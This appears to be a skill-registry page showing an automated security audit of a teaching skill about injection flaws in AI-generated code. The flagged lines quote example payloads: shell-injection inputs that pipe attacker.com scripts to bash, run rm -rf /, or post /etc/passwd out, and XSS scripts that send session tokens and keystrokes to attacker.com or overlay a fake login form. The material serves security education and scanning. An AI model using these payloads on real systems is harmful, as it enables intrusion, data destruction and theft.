Skip to main content

injection-vulnerabilities-ai-generated-code

Explores how AI-generated code can introduce injection vulnerabilities, providing insights into SQL injection, command injection, and XSS patterns.

Install this skill

or
0/100

Security score

The injection-vulnerabilities-ai-generated-code skill was audited on Feb 12, 2026 and we found 49 security issues across 4 threat categories, including 8 critical. Review the findings below before installing.

Categories Tested

Security Issues

high line 140

Direct command execution function call

SourceSKILL.md
140exec(command, (error, stdout, stderr) => {
high line 176

Direct command execution function call

SourceSKILL.md
176const convert = spawn('convert', [
critical line 193

Direct command execution function call

SourceSKILL.md
193**1. exec() is Simpler:**
critical line 194

Direct command execution function call

SourceSKILL.md
194- Single function call vs spawn() configuration
critical line 196

Direct command execution function call

SourceSKILL.md
196- exec() allows shell syntax (pipes, redirects)
critical line 232

Direct command execution function call

SourceSKILL.md
232**exec() vs spawn():**
critical line 234

Direct command execution function call

SourceSKILL.md
234| Feature | exec() | spawn() |
critical line 392

Direct command execution function call

SourceSKILL.md
392- Shell: `exec(f"convert {filename}")`
critical line 430

Direct command execution function call

SourceSKILL.md
430❌ **exec() with user input:**
high line 432

Direct command execution function call

SourceSKILL.md
432exec(`command ${userInput}`)
high line 433

Direct command execution function call

SourceSKILL.md
433exec("command " + userInput)
critical line 437

Direct command execution function call

SourceSKILL.md
437✅ **spawn() with argument array:**
high line 439

Direct command execution function call

SourceSKILL.md
439spawn('command', [arg1, arg2, arg3])
high line 500

Direct command execution function call

SourceSKILL.md
500exec(`convert ${filename} output.jpg`); // VULNERABLE
high line 517

Direct command execution function call

SourceSKILL.md
517const convert = spawn('convert', [filename, 'output.jpg']);
medium line 138

Template literal with variable interpolation in command context

SourceSKILL.md
138const command = `convert ${inputFile} -quality ${quality} output.${outputFormat}`;
medium line 144

Template literal with variable interpolation in command context

SourceSKILL.md
144res.json({ success: true, output: `output.${outputFormat}` });
medium line 179

Template literal with variable interpolation in command context

SourceSKILL.md
179`output.${outputFormat}`
medium line 186

Template literal with variable interpolation in command context

SourceSKILL.md
186res.json({ success: true, output: `output.${outputFormat}` });
medium line 265

Template literal with variable interpolation in command context

SourceSKILL.md
265html += `
medium line 297

Template literal with variable interpolation in command context

SourceSKILL.md
297html += `
high line 393

Template literal with variable interpolation in command context

SourceSKILL.md
393- HTML: `html += `<div>${user_content}</div>``
medium line 432

Template literal with variable interpolation in command context

SourceSKILL.md
432exec(`command ${userInput}`)
medium line 447

Template literal with variable interpolation in command context

SourceSKILL.md
447html += `<div>${userContent}</div>`
medium line 454

Template literal with variable interpolation in command context

SourceSKILL.md
454html += `<div>${escapeHtml(userContent)}</div>`
medium line 500

Template literal with variable interpolation in command context

SourceSKILL.md
500exec(`convert ${filename} output.jpg`); // VULNERABLE
high line 149

Piping content to bash shell

SourceSKILL.md
149// inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"
high line 212

Destructive rm -rf command

SourceSKILL.md
212inputFile = "image.jpg; rm -rf /"
high line 213

Destructive rm -rf command

SourceSKILL.md
213// Executes: convert image.jpg -quality 80 output.jpg; rm -rf /
medium line 434

System command execution

SourceSKILL.md
434os.system(f"command {user_input}") // Python
low line 132

Node child_process module reference

SourceSKILL.md
132const { exec } = require('child_process');
low line 155

Node child_process module reference

SourceSKILL.md
155const { spawn } = require('child_process');
low line 496

Node child_process module reference

SourceSKILL.md
496import { exec } from 'child_process';
low line 506

Node child_process module reference

SourceSKILL.md
506import { spawn } from 'child_process';
medium line 434

Python os.system command execution

SourceSKILL.md
434os.system(f"command {user_input}") // Python
medium line 440

Python subprocess execution

SourceSKILL.md
440subprocess.run(['command', arg1, arg2]) // Python
medium line 149

Curl to non-GitHub URL

SourceSKILL.md
149// inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"
medium line 226

Curl to non-GitHub URL

SourceSKILL.md
226inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"
low line 279

Fetch to external URL

SourceSKILL.md
279// comment.content = "<script>fetch('/api/session').then(r=>r.text()).then(t=>fetch('https://attacker.com?token='+t))</script>"
low line 338

Fetch to external URL

SourceSKILL.md
338fetch('/api/session')
low line 341

Fetch to external URL

SourceSKILL.md
341fetch('https://attacker.com/steal', {
low line 366

Fetch to external URL

SourceSKILL.md
366fetch('https://attacker.com/keys?key=' + e.key);
high line 226

Access to /etc/passwd

SourceSKILL.md
226inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"
low line 149

External URL reference

SourceSKILL.md
149// inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"
low line 226

External URL reference

SourceSKILL.md
226inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"
low line 279

External URL reference

SourceSKILL.md
279// comment.content = "<script>fetch('/api/session').then(r=>r.text()).then(t=>fetch('https://attacker.com?token='+t))</script>"
low line 341

External URL reference

SourceSKILL.md
341fetch('https://attacker.com/steal', {
low line 355

External URL reference

SourceSKILL.md
355document.body.innerHTML += '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><form action="https://attacker.com/phish"><h2>Session Expired - Please Login</
low line 366

External URL reference

SourceSKILL.md
366fetch('https://attacker.com/keys?key=' + e.key);
Scanned on Feb 12, 2026
View Security Dashboard
Installation guide →
GitHub Stars 106
Rate this skill
Categorydevelopment
UpdatedMay 21, 2026
claude-codecursorgithub-copilotcodexchatgptwindsurfclineroo-codeampopencodevibemanusantigravitygemini-clibackendapitestingcross-platformbackend-developersecurity-engineerdata-engineerqa-engineerdevops-sredevelopment
majiayu000/claude-skill-registry